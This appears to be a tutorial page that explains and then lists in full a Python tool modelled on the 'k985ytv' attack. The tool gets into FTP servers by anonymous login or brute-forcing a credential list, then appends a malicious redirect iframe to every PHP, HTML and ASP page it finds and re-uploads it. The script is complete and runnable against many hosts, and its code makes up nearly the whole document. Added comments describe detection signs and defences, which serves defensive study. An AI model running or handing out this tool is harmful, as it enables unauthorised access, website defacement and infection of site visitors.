目錄
一、最後一步:
分析:
二、完整
分析:
分析:
The final step of the whole attack: the attack() function
1. The attack() function takes a username, password, hostname and redirect location as its input parameters. It first logs in to the FTP server with the username and password.
2. The script then searches for default web pages, downloads each page it finds, and adds the malicious redirection code to it.
3. The script uploads the tampered page back to the FTP server; any machine that then visits that web server will be compromised.
def attack(username, password, tgtHost, redirect):
    """Log in to tgtHost over FTP and run injectPage on every page found.

    returnDefault() and injectPage() are defined in the complete listing
    further down the page. The credentials are sent with ftplib's plain
    FTP login, so they and the transferred pages cross the network
    unencrypted.
    """
    ftp = ftplib.FTP(tgtHost)
    ftp.login(username, password)
    # Pages are selected from the directory listing of the login directory.
    defPages = returnDefault(ftp)
    for defPage in defPages:
        # Each iteration is one RETR followed by one STOR of the same file
        # name in the same session -- a pairing that stands out in FTP
        # transfer logs.
        injectPage(ftp, defPage, redirect)
分析:
Adding code that parses a few command-line arguments completes the script.
First, check whether the FTP server can be accessed anonymously. If it cannot, brute-force the password. Once a password has been cracked, or if the server allows anonymous login, log in to the FTP site and carry out the attack. Although it is only a few hundred lines of code, it completely replicates the attack vector used in the k985ytv attack.
# Complete listing: probe each target for anonymous FTP access, fall back to
# a user:password list, then download every .php/.htm/.asp file in the login
# directory, append the redirect string and upload it over the original.
#
# What this looks like from the server side, and what stops it:
#   * an anonymous login, or a run of failed logins about one second apart,
#     each on a new control connection from the same client;
#   * NLST, then RETR + STOR of the same web file within one session;
#   * a served page whose content changes without a deployment.
# Disabling anonymous access, keeping FTP accounts from writing to the web
# root, login rate limiting / lockout, and file-integrity monitoring on the
# document root each break one step of the chain.
import ftplib
import optparse
import time


def anonLogin(hostname):
    """Return True if hostname accepts an anonymous FTP login, else False.

    Any exception (connection failure or rejected login) is printed and
    treated as failure.
    """
    try:
        ftp = ftplib.FTP(hostname)
        # Probe uses user 'anonymous' with the literal password 'password'.
        ftp.login('anonymous', 'password')
        print('\n(*) ' + str(hostname) + ' FTP Anonymous Logon Succeeded.')
        ftp.quit()
        return True
    except Exception as e:
        print('[*]' + str(e))
        print('\n[-]' + str(hostname) + 'FTP Anonymous Logon Failed.')
        return False


def bruteLogin(hostname, passwdFile):
    """Try each 'user:password' line of passwdFile against hostname.

    Returns the first (userName, passWord) pair that logs in, or
    (None, None) when no line succeeds.
    """
    # NOTE(review): the file handle is never closed.
    pF = open(passwdFile, 'r')
    for line in pF.readlines():
        # One attempt per second; every attempt opens a fresh connection, so
        # the server sees a steady series of failed logins from one source.
        time.sleep(1)
        userName = line.split(':')[0]
        passWord = line.split(':')[1].strip('\r').strip('\n')
        # Candidate credentials are echoed to stdout in clear text.
        print('[+] Trying: ' + userName + '/' + passWord)
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(userName, passWord)
            print('\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + userName + '/' + passWord)
            ftp.quit()
            return (userName, passWord)
        except Exception as e:
            # Every failure (refused connection, bad login) is ignored and the
            # loop moves on; the failed connection is not explicitly closed.
            pass
    print('\n[-] Could not brute force FTP credentials')
    return (None, None)


def returnDefault(ftp):
    """Return the listed file names that look like web pages.

    A name is kept when its lower-cased form contains '.php', '.htm' or
    '.asp' anywhere (substring match, not an extension check). When the
    listing fails, a message is printed and the function returns None
    rather than a list.
    """
    try:
        # NLST of the session's current directory only; no recursion.
        dirList = ftp.nlst()
    except:
        dirList = []
        print('[-] Could not list directory contents.')
        print('[-] Skipping To Next Target.')
        return
    retList = []
    for fileName in dirList:
        fn = fileName.lower()
        if '.php' in fn or '.htm' in fn or '.asp' in fn:
            print('[+] Found default page: ' + fileName)
            retList.append(fileName)
    return retList


def injectPage(ftp, page, redirect):
    """Download page, append redirect to the local copy, upload it back.

    The working copy is written to '<page>.tmp' in the local current
    directory and is left there afterwards.
    """
    f = open(page + '.tmp', 'w')
    # retrlines hands each line to the callback with its line ending
    # stripped, and f.write adds none, so the local copy is written without
    # line breaks -- the stored page differs from the original in more than
    # the appended text, which file-integrity checks will flag.
    ftp.retrlines('RETR ' + page, f.write)
    print('[+] Downloaded Page: ' + page)
    # The redirect string is appended after everything already in the page.
    f.write(redirect)
    f.close()
    print('[+] Injected Malicious IFrame on: ' + page)
    # STOR under the original name replaces the served file; this only
    # succeeds when the FTP account has write access to that directory.
    # NOTE(review): the file object opened here is never closed.
    ftp.storlines('STOR ' + page, open(page + '.tmp'))
    print('[+] Uploaded Injected Page: ' + page)


def attack(username, password, tgtHost, redirect):
    """Log in to tgtHost and run injectPage on every page returnDefault finds."""
    ftp = ftplib.FTP(tgtHost)
    ftp.login(username, password)
    defPages = returnDefault(ftp)
    # NOTE(review): returnDefault returns None when the listing fails, and
    # the session is never closed with quit().
    for defPage in defPages:
        injectPage(ftp, defPage, redirect)


def main():
    """Parse -H / -f / -r and process each target host in turn."""
    parser = optparse.OptionParser('usage%prog ' + '-H <target host[s]> -r <redirect page>' + '[ -f <userpass file>]')
    parser.add_option('-H', dest='tgtHosts', type='string', help='specify target host')
    parser.add_option('-f', 
dest='passwdFile', type='string', help='specify user/password file')
    parser.add_option('-r', dest='redirect', type='string', help='specify a redirection page')
    (options, args) = parser.parse_args()
    # Hosts are split on the two-character separator ', ' (comma + space).
    # NOTE(review): str() turns a missing -H into the string 'None', so the
    # list is never None and only a missing -r triggers the usage exit below.
    tgtHosts = str(options.tgtHosts).split(', ')
    passwdFile = options.passwdFile
    redirect = options.redirect
    if tgtHosts == None or redirect == None:
        print(parser.usage)
        exit(0)
    for tgtHost in tgtHosts:
        username = None
        password = None
        # Anonymous access is tried first; the credential list is used only
        # when it fails and -f was supplied.
        if anonLogin(tgtHost) == True:
            username = 'anonymous'
            # The probe in anonLogin used 'password'; this login uses ''.
            password = ''
            print('[+] Using Anonymous Creds to attack')
            attack(username, password, tgtHost, redirect)
        elif passwdFile != None:
            (username, password) = \
                bruteLogin(tgtHost, passwdFile)
            if password != None:
                # Recovered credentials are printed in clear text.
                print('[+] Using Creds: ' + username + '/' + password + ' to attack')
                attack(username, password, tgtHost, redirect)


if __name__ == '__main__':
    main()